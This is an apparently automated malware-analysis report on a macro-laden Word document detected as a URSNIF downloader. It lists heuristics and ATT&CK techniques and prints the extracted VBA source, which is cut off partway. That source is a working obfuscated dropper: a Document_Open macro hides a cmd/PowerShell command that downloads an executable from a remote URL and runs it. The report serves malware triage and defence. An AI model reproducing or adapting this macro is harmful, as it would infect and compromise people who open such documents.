Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open auto-execution macro, a common technique for initiating malicious actions as soon as the document is opened. The critical "Shell() call in VBA" heuristic, together with the ClamAV detection "Doc.Downloader.URSNIF-6729855-3", strongly indicates that the macro is designed to download and execute a secondary payload. The script builds a command line for execution, likely involving downloading content from a remote source.
Heuristics (6)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ade6ca1d3c1f8183c38b6d2048e0b093c07ae71f31d2e80afe7ed28c3af8fb4e) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4426 bytes |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "jauoCtU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Second "469029868" + "ZMjA"
Second "BMCBQdw" + "62225295"
Second "158" + "w" + "jlNc" + "pIS"
Second "OET" + "113246381" + "Orz" + "111264490"
Second "1007" + "85951675" + "102681016" + "r"
Second "CiWR" + "8579" + "5500" + "WtX"
Second "3257" + "YwiHhTAuSXtiI"
Shell ztjhprTBcX + hDOrGdmrtK, CStr(vbHide)
Second "a" + "HuUW" + "6734" + "84882659"
Second "EdBlMmVju" + "U" + "169644791" + "3754095"
Second "4862" + "acaAtdFHOkBoDn"
End Sub
Attribute VB_Name = "LVVMmGtwaj"
Function ztjhprTBcX()
On _
Error _
Resume _
Next
Second "XbkBWUFwuEw" + "3994" + "MQm" + "OUnsm"
WhVXElduiDB = Format(Chr(9 + 12 + 1 + 14 + 63)) + "md" + " " + "/V^" + ":^" + "O/" + Format(Chr(6 + 8 + 1 + 9 + 43)) + Format(Chr(3 + 4 + 0 + 4 + 23)) + "s^e^t ^" + "5i=" + "^ " + " " + " ^" + " ^ ^ "
Second "G" + "8331" + "1102" + "Xj"
Second "533022878" + "232992923" + "QImmuiGAnonN" + "qCcRwDZoINd"
jGOlCE = " ^ ^ ^ " + " ^ }" + "}{h" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "^" + "t^a" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "};^" + "k" + "aer^" + "b^;" + "^Ewo$ ^" + "m^etI-e" + "kovn" + "^I;)E^w"
Second "5080" + "juH"
Second "84068266" + "WB" + "noZWIKOhwEY" + "156844962"
XvPNucl = "^o$" + " " + "^,p^Y" + "^K^$" + "(e" + "^li^F"
Second "izbdCDHvI" + "YDXFjrOqkB" + "4808" + "osau"
Second "bOYiHQmP" + "334074249" + "VvU" + "hsfpzEnIA"
pzAThh = "d^aoln" + "w^o" + "D^.^" + "B^zT$" + "^{^yr" + "^t^" + "{)^zYk" + "$" + "^ n^i^" + " ^pY" + "^K^$(h" + Format(Chr(9 + 12 + 1 + 14 + 63))
Second "5707" + "3702"
Second "267686639" + "qWW"
Second "Ijq" + "A" + "odf" + "kFQ"
PjjBE = "^aer^of" + "^" + ";'^e" + "x^e" + "^.'^+l" + "r" + Format(Chr(6 + 8 + 1 + 9 + 43)) + "^$+'\" + "'+" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "i^l" + "bu" + "p^"
Second "482" + "UVJ"
IclfoiO = ":vn" + "e^$^=E^" + "w" + "^o" + "^$^;"
Second "bRaH" + "435111795" + "9033" + "wiH"
XiStMbdzPi = "'^5^5" + "3' " + "= ^l" + "r" + Format(Chr(6 + 8 + 1 + 9 + 43)) + "$;)^'" + "^@^'(" + "^t^i" + "l^pS.^'" + "n^k^t" + ".2^" + "gmo" + "=l" + "?^ph^p."
ztjhprTBcX = WhVXElduiDB + jGOlCE + XvPNucl + pzAThh + PjjBE + IclfoiO + XiStMbdzPi
Second "19514661" + "U"
Second "3604" + "LEZB"
Second "VCLujjRCS" + "3875" + "kXKroNhDY" + "16943346"
End Function
Function hDOrGdmrtK()
On _
Error _
Resume _
Next
Second "hQR" + "F" + "QSKOSvXYzvXL" + "30745071"
Second "Tps" + "4109"
OpiAVmVG = "^tok^s" + "na^" + "p^o/T^T" + "R/^m^" + "o" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "^.d^s" + "ay^t^ee" + "^g^h" + "y^t" + "r" + "edn"
Second "SKzm" + "aumVBNhRTaWDS" + "421481159" + "cUpLICqWzM"
Second "GUXVr" + "120037695" + "107228785" + "l"
Second "PG" + "5884" + "4139" + "630"
mVUEYHpii = "a//:" + "pt^th'" + "=z^Y^k" + "$^;" + "tn^e" + "i^" + "l" + Format(Chr(6 + 8 + 1 + 9 + 43)) + "^be^W" + "^.te" + "N " + "t" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "e^j"
Second "495416852" + "ptSMwmZQSz" + "3482" + "woj"
nhAcGiiO = "^bo-" + "^w^en=^" + "Bz^T^$" + " l" + "le^" + "h^sre" + "w^op" + "&&^f^" + "or "
Second "ZcczbjuUB" + "396462912" + "ztb" + "lNaNwDnPFz"
Second "274669218" + "kN"
Second "kvHjnSn" + "L"
zmwzuwS = "/L %^F " + "^in" + " (2^" + "65;-" + "^1^;^0)"
Second "uGbXrRrlNWFz" + "JX" + "wnvwMVrf" + "U"
Second "51804371" + "3736"
Second "vVwYbw" + "EW" + "450227293" + "434013735"
Second "482722415" + "rp"
NTHSmVDTuXB = "^d" + "o ^s^e" + "t" + " " + "v^s^7=" + "!" + "v^s^7" + "!!^5i:~" + "%"
Second "nACD" + "159590138" + "497328512" + "laRafZPvRXuft"
Second "w" + "Y"
Second "VULoY" + "X" + "btpD" + "SRU"
SUKOXNBZZF = "^F" + "," + "1!&" + "&^if %^" + "F=^=^0" + " " + Format(Chr(9 + 12 + 1 + 14 + 63)) + "^" + "a^l^l" + " %v^s^" + "7" + ":^~5%" + For
... (truncated)